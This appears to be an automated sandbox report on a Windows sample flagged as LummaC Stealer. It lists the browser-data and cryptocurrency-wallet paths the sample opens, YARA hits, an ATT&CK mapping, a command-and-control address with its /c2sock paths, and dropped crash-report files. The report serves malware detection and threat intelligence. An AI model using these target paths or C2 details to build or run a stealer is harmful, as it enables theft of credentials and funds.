                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: C:\Users\user\Desktop\I2BJhmJou4.exeDirectory queried: C:\Users\user\DocumentsJump to behavior
                  Source: Yara matchFile source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.2.I2BJhmJou4.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0.3.I2BJhmJou4.exe.49f0000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000000.00000002.3246211626.0000000002ED0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000002.3244849717.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000000.00000003.1423642848.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: I2BJhmJou4.exe PID: 7500, type: MEMORYSTR
                  Source: Yara matchFile source: dump.pcap, type: PCAP

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  LSASS Driver                  		1
                  Process Injection                  		32
                  Virtualization/Sandbox Evasion                  		1
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Encrypted Channel                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault AccountsScheduled Task/Job1
                  DLL Side-Loading                  		1
                  LSASS Driver                  		1
                  Process Injection                  		LSASS Memory471
                  Security Software Discovery                  		Remote Desktop Protocol31
                  Data from Local System                  		1
                  Non-Application Layer Protocol                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		Security Account Manager32
                  Virtualization/Sandbox Evasion                  		SMB/Windows Admin SharesData from Network Shared Drive11
                  Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                  Obfuscated Files or Information                  		NTDS2
                  Process Discovery                  		Distributed Component Object ModelInput CaptureProtocol ImpersonationTraffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                  Software Packing                  		LSA Secrets1
                  Account Discovery                  		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  DLL Side-Loading                  		Cached Domain Credentials1
                  System Owner/User Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync11
                  File and Directory Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem13
                  System Information Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  I2BJhmJou4.exe84%ReversingLabsWin32.Trojan.Smokeloader
                  I2BJhmJou4.exe100%Joe Sandbox ML

                  Dropped Files

                  No Antivirus matches

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://94.158.244.69/KH00%Avira URL Cloudsafe
                  http://94.158.244.69/c2socklb:0%Avira URL Cloudsafe
                  http://94.158.244.69/yH0%Avira URL Cloudsafe
                  http://94.158.244.69/c2socks0%Avira URL Cloudsafe
                  http://94.158.244.69/oH0%Avira URL Cloudsafe
                  http://94.158.244.69/c2sockab?0%Avira URL Cloudsafe
                  http://94.158.244.69/%OB0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  No contacted domains info

                  Contacted URLs

                  NameMaliciousAntivirus DetectionReputation
                  http://94.158.244.69/c2sockfalse
                    		high

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://duckduckgo.com/chrome_newtabI2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                      		high
                      http://94.158.244.69/c2socksI2BJhmJou4.exe, 00000000.00000002.3246415805.0000000002FE0000.00000004.00000020.00020000.00000000.sdmp, I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      https://duckduckgo.com/ac/?q=I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        https://www.google.com/images/branding/product/ico/googleg_lodp.icoI2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://crl.rootca1.amazontrust.com/rootca1.crl0I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpfalse
                              		high
                              http://upx.sf.netAmcache.hve.8.drfalse
                                		high
                                https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  http://ocsp.rootca1.amazontrust.com0:I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://94.158.244.69/c2sockab?I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.ecosia.org/newtab/I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brI2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpfalse
                                        		high
                                        http://94.158.244.69/c2socklb:I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000056E5000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://94.158.244.69/%OBI2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://ac.ecosia.org/autocomplete?q=I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://94.158.244.69/KH0I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          http://x1.c.lencr.org/0I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpfalse
                                            		high
                                            http://x1.i.lencr.org/0I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchI2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                http://crt.rootca1.amazontrust.com/rootca1.cer0?I2BJhmJou4.exe, 00000000.00000002.3251368757.0000000005D14000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://94.158.244.69/I2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://94.158.244.69/oHI2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    https://support.mozilla.org/products/firefoxgro.allI2BJhmJou4.exe, 00000000.00000002.3252254739.0000000006403000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=I2BJhmJou4.exe, 00000000.00000003.1913354234.0000000005050000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        		high
                                                        http://94.158.244.69/yHI2BJhmJou4.exe, 00000000.00000002.3249213075.00000000055E0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        World Map of Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public IPs

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        94.158.244.69
                                                        		unknownMoldova Republic of
                                                        		39798MIVOCLOUDMDtrue

                                                        General Information

                                                        Joe Sandbox version:41.0.0 Charoite
                                                        Analysis ID:1555044
                                                        Start date and time:2024-11-13 10:52:40 +01:00
                                                        Joe Sandbox product:CloudBasic
                                                        Overall analysis duration:0h 7m 19s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                        Number of analysed new started processes analysed:10
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Sample name:I2BJhmJou4.exe
                                                        renamed because original name is a hash value
                                                        Original Sample Name:16f4ab4f0ba6ebd746bcc6b032346ffb80f88814e78e103739af0e5569fee962.exe
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winEXE@2/5@0/1
                                                        EGA Information:
                                                        • Successful, ratio: 100%
                                                        HCA Information:
                                                        • Successful, ratio: 95%
                                                        • Number of executed functions: 59
                                                        • Number of non-executed functions: 104
                                                        Cookbook Comments:
                                                        • Found application associated with file extension: .exe
                                                        • Override analysis time to 240s for sample files taking high CPU consumption

                                                        Warnings

                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                        • Excluded IPs from analysis (whitelisted): 20.42.65.92
                                                        • Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                                        • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                        • VT rate limit hit for: I2BJhmJou4.exe

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        04:56:38API Interceptor1x Sleep call for process: WerFault.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        94.158.244.69OlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock
                                                        ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69/c2sock

                                                        Domains

                                                        No context

                                                        ASNs

                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                        MIVOCLOUDMDOlZzqwjrwO.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        Vd3tOP5WSD.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        g1kWKm20Z5.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        cgln32y2HF.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        4Oq9i3gm0g.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        RX7nieXlNm.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        5M5e9srxkE.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        dV01QsYySM.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        BeO2C8S5Ly.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69
                                                        ToNaCrWjm7.exeGet hashmaliciousLummaC StealerBrowse
                                                        • 94.158.244.69

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_I2BJhmJou4.exe_7abd4b2ffccb829face88ca1d1d9f1e903b9_37ce086c_ac1319ab-d779-4ed1-ae4c-b7b64b7db42d\Report.wer

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):65536
                                                        Entropy (8bit):0.8423482439830231
                                                        Encrypted:false
                                                        SSDEEP:96:HEyYA3haHCslA4hclAS7Zf2QXIDcQqc6acEVcw3ZOeOO+HbHg/PB6HeaOy1EoqzV:kyYfCMYb0UevojGdzuiF8Z24IO8QLC
                                                        MD5:7E20C02C760B970A272638D3132B1F18
                                                        SHA1:DC4E32AD39F5DE08EA777235407803FBE3299D54
                                                        SHA-256:C4DEC0AD2909B6C6D565324ED07123129CBBE832F68AE3D1D3EDFD813DFD603A
                                                        SHA-512:74156CEE6DF706CCE73A40480F0D2C8FDF06E3D8B90B3847B3EAD7EACD38BC39F6D04592AF9108FF9754F4DC847ACE58BE498A61888C81633572E4AAB878446B
                                                        Malicious:true
                                                        Reputation:low
                                                        Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.5.9.6.5.3.9.2.5.0.0.6.3.0.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.5.9.6.5.3.9.2.8.9.1.2.5.1.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.c.1.3.1.9.a.b.-.d.7.7.9.-.4.e.d.1.-.a.e.4.c.-.b.7.b.6.4.b.7.d.b.4.2.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.a.d.4.2.e.d.c.-.6.e.3.4.-.4.f.6.2.-.8.5.7.6.-.a.b.a.e.8.a.e.f.2.6.6.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.I.2.B.J.h.m.J.o.u.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.d.4.c.-.0.0.0.1.-.0.0.1.4.-.d.9.b.f.-.c.2.e.7.b.1.3.5.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.d.c.0.c.4.6.6.b.8.f.4.7.b.5.1.3.3.0.7.1.3.f.3.3.6.2.4.5.9.b.8.d.0.0.0.0.f.f.f.f.!.0.0.0.0.a.7.f.0.7.5.b.a.3.7.9.6.1.5.4.5.a.e.0.a.8.1.9.b.d.a.5.d.2.b.e.2.8.6.1.8.d.6.0.d.!.I.2.B.J.h.m.J.o.u.4...e.x.e.....T.a.r.g.e.t.A.p.p.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER40BD.tmp.dmp

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:Mini DuMP crash report, 15 streams, Wed Nov 13 09:56:32 2024, 0x1205a4 type
                                                        Category:dropped
                                                        Size (bytes):41968
                                                        Entropy (8bit):2.4935738305279456
                                                        Encrypted:false
                                                        SSDEEP:192:fyQX3wNBFlgOSbfHJnfoFlD67/BbT+h/ar3HPLx4Nqn:LwTFpSbfHFgDuBi/aLvLwa
                                                        MD5:8B78AC2ED0F69C319E060BADFE213524
                                                        SHA1:601739C05ABC194E87C7460788438799CBF52279
                                                        SHA-256:FF8E4F672902C473E4280A314A6DF5D5E5B6F4E49ECDD95DFC54BE1BCDB1F486
                                                        SHA-512:24AD49F347FB655AFE6B623D8B91878472F8F9559300CD58EBE5208F155219CD6C70D7839F379E515E5F33CD54915F4C7595F22C86C3C7B5ED723FE0FEDDFEDB
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:MDMP..a..... ........w4g............4...............H.......<...........T...."..........`.......8...........T............B..Pa..........L...........8...............................................................................eJ..............GenuineIntel............T.......L....w4gM............................0..2...........,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER414B.tmp.WERInternalMetadata.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):8336
                                                        Entropy (8bit):3.7024715539745583
                                                        Encrypted:false
                                                        SSDEEP:192:R6l7wVeJRI6aY26YSqSUdgmfdYpDy89bvEsf0FFm:R6lXJ+6ah6YvSUdgmfdev3fT
                                                        MD5:5A0CF5FBCD8F402C4DF17AED5075F114
                                                        SHA1:1E6FDE590E3DFB54753CF31FE1D5432D231D3B54
                                                        SHA-256:A3E1E476F62630AA35B84FAD76C8DEF4C2B9835377FF249287B5726481AC308C
                                                        SHA-512:79DC2E4BA0B79F7673F747D0A4FAC5818DB53521C871D2A17C09AB57CFE0F521724C16AD6FD3CC7FB461045BFED6FF679E39ED3A8C4F48EC62D7D3771A4AC760
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.5.0.0.<./.P.i.

                                                        C:\ProgramData\Microsoft\Windows\WER\Temp\WER417B.tmp.xml

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):4579
                                                        Entropy (8bit):4.473223919125026
                                                        Encrypted:false
                                                        SSDEEP:48:cvIwWl8zsSJg77aI9nMWpW8VYuYm8M4J9tFwjV+q8+BScqId:uIjfgI7xl7VGJSVxzqId
                                                        MD5:A9DE4FB8DFEFBECA1EDB7075BAAB6942
                                                        SHA1:E9492D8EC00AA32349719DDA47300D3126FCC182
                                                        SHA-256:254298481A1AA0446D17019EB4A7D0F48209075DC955F7C6BAC550AA0983EE6B
                                                        SHA-512:0746F6A96935320BE3AE6038EC8892C628DC74F4CC5A0EDAFDB7922021FB40AE2BEFCBB3CC292CFDA00CAD88AFDA0EBD91E7B9ACD863BA52F5153C200E9BB9B1
                                                        Malicious:false
                                                        Reputation:low
                                                        Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="586139" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                        C:\Windows\appcompat\Programs\Amcache.hve

                                                        Download File
                                                        Process:C:\Windows\SysWOW64\WerFault.exe
                                                        File Type:MS Windows registry file, NT/2000 or above
                                                        Category:dropped
                                                        Size (bytes):1835008
                                                        Entropy (8bit):4.372088739129614
                                                        Encrypted:false
                                                        SSDEEP:6144:sFVfpi6ceLP/9skLmb0ayWWSPtaJG8nAge35OlMMhA2AX4WABlguN2iL5:cV1QyWWI/glMM6kF7Uq
                                                        MD5:B83EF58CD4FEE920D622AC23A56F77CB
                                                        SHA1:19A8F49E9246F62FEC7BAEB73CCE1E249139E9C9
                                                        SHA-256:EA9E5BBC0B046BCF8D75AD6F787A7F901114BB10DDCB6E663A9A97085515546B
                                                        SHA-512:1FB5AF3352DF4A009AE92C7839AA8E41D861C386B572F718255C9654A00C735AC3C1B7F4BE99BA437A1C9AD2F4BF12F554B62D2FD573F30A570B940361E011F2
                                                        Malicious:false
                                                        Reputation:low
